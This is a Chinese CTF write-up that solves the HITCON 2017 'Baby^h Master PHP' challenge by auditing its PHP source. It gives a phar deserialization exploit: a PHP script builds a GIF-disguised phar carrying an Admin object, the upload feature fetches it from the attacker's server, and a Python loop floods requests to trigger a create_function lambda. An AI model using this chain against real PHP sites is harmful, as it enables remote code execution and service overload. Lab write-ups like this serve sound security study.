[HITCON 2017]Baby^h Master PHP
[HITCON 2017]Baby^h Master PHP
考点
代码审计
create_function生成的匿名函数特性
phar反序列化
wp
第一段:初始条件
看一下初始的条件
$FLAG = create_function("", 'die(`/read_flag`);');
$SECRET = `/read_secret`;
$SANDBOX = "/var/www/data/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($SANDBOX);
@chdir($SANDBOX);首先回顾一下create_function是啥
create_function('$a','echo $a;')等价于创建一个匿名函数,它的名字是\x00lambda_%d
eval(
function __lambda_func($a){
echo $a;
}
)第一行等同于
eval(
function __lambda_func(){
die(`/read_flag`);
}
)这个初始过程是:获取FLAG,获取密钥,生成沙盒
防止在公共靶机下出现啥bug
第二段:输入
看一下输入在哪儿
$mode = $_GET["m"];
if ($mode == "upload") {
upload(check_session());
} else if ($mode == "show") {
show(check_session());
} else {
echo "IP:".$_SERVER["REMOTE_ADDR"];
echo "Sandbox:"."/var/www/data/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
highlight_file(__FILE__);
}有三种模式,upload、show以及其它
第三段:upload模式
无论哪个模式都会执行check_session函数,那就看一下
function check_session() {
global $SECRET;
$data = $_COOKIE["session-data"];
list($data, $hmac) = explode("-----", $data, 2);
if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)) {
die("Bye");
}
if (!hash_equals(hash_hmac("sha1", $data, $SECRET), $hmac)) {
die("Bye Bye");
}
$data = unserialize($data);
if (!isset($data->avatar)) {
die("Bye Bye Bye");
}
return $data->avatar;
}先获取cookie中的session-data,我这里是O%3A4%3A%22User%22%3A1%3A%7Bs%3A6%3A%22avatar%22%3Bs%3A46%3A%22%2Fvar%2Fwww%2Fdata%2F0f3cd5989359bdd5a04508bf19418e31%22%3B%7D-----73dcb35650323907c141d8988a5d0d962396fbbe
那它怎么来的呢,可以看到,data是User类序列化的内容,而hmac是hash_hmac("sha1", $data, $SECRET)的结果
if (!isset($_COOKIE["session-data"])) {
$data = serialize(new User($SANDBOX));
$hmac = hash_hmac("sha1", $data, $SECRET);
setcookie("session-data", sprintf("%s-----%s", $data, $hmac));
}
class User {
public $avatar;
function __construct($path) {
$this->avatar = $path;
}
}然后将cookie进行分割,还原出data和hmac。并对data和hmac再做一次校验,验证hmac是否由hash_hmac("sha1", $data, $SECRET)生成。是的话对data进行反序列化,然后返回它的avatar属性。
upload模式下,还会再去执行upload()函数,这里的path参数就是自己的沙盒地址
function upload($path) {
$data = file_get_contents($_GET["url"] . "/avatar.gif");
if (substr($data, 0, 6) !== "GIF89a") {
die("Fuck off");
}
file_put_contents($path . "/avatar.gif", $data);
die("Upload OK");
}然后从外部获取url下的avatar.gif,覆盖掉沙盒的那个avatar.gif
第四段:show模式
show模式下,在check_session()获取沙盒地址后,判断这个地址下的avatar.gif存不存在,存在的话就返回这个avatar.gif
function show($path) {
if (!file_exists($path . "/avatar.gif")) {
$path = "/var/www/html";
}
header("Content-Type: image/gif");
die(file_get_contents($path . "/avatar.gif"));
}第五段:查漏
整体看完了,发现Admin类好像没有用到,这里大概就是最终要利用的地方
class Admin extends User {
function __destruct() {
$random = bin2hex(openssl_random_pseudo_bytes(32));
eval("function my_function_$random() {"
. " global \$FLAG; \$FLAG();"
. "}");
$_GET["lucky"]();
}
}__destruct里面定义一个随机函数,执行这个随机函数可以获取flag,但是直接执行初始的匿名函数就可以了
思路
很明显的phar反序列化,生成Admin类的phar文件,通过upload函数触发phar反序列化,然后执行匿名函数
<?php
class Admin{
public $avatar='xyz';
}
$a = new Admin();
$phar = new Phar('123.phar',0,'123.phar');
$phar->startBuffering();
$phar->setStub('GIF89a<?php __HALT_COMPILER(); ?>');
$phar->setMetadata($a);
$phar->addFromString('text.txt','test');
$phar->stopBuffering();最后一段引用官方wp原文
但是我们并不能知道当前的匿名函数到底有多少个, 因为每访问一次题目就会生成一个匿名函数; 最后就引出了最后一个考点, Apache-prefork模型(默认模型)在接受请求后会如何处理,首先Apache会默认生成5个child server去等待用户连接, 默认最高可生成256个child server, 这时候如果用户大量请求, Apache就会在处理完MaxRequestsPerChild个tcp连接后kill掉这个进程,开启一个新进程处理请求(这里猜测Orange大大应该修改了默认的0,因为0为永不kill掉子进程 这样就无法fork出新进程了) 在这个新进程里面匿名函数就会是从1开始的了
生成phar放在自己的服务器上
上传文件
?c=upload&url=http://ip写个脚本一直请求
?m=upload&url=phar:///var/www/data/***&lucky=%00lambda_1
import requests
url = 'http://12c6a169-a23b-4d57-bb1c-b16d6513f0ba.node3.buuoj.cn/?m=upload&url=phar:///var/www/data/0f3cd5989359bdd5a04508bf19418e31&lucky=%00lambda_1'
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Cookie': 'UM_distinctid=1773491acc0ff-0d74662bd23926-12666d4a-144000-1773491acc126b; session-data=O%3A4%3A%22User%22%3A1%3A%7Bs%3A6%3A%22avatar%22%3Bs%3A46%3A%22%2Fvar%2Fwww%2Fdata%2F0f3cd5989359bdd5a04508bf19418e31%22%3B%7D-----73dcb35650323907c141d8988a5d0d962396fbbe'
}
while True:
r =requests.get(url,headers=header)
if 'flag' in r.text:
print(r.text)
最后更新于